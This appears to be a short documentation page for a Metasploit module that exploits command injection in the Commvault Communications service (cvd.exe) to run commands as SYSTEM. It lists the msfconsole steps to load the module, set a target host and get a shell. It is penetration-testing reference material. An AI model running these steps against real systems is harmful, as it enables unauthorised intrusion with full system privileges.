470 B
470 B
Vulnerable Application
This module exploits a remote command injection vulnerability in the Commvault Communications service (cvd.exe). Exploitation of this vulnerability can allow for remote command execution as SYSTEM.
Additional information can be found here
Verification Steps
-
Start msfconsole
-
use exploit/windows/misc/commvault_cmd_exec -
set RHOST [ip] -
exploit -
shellz :)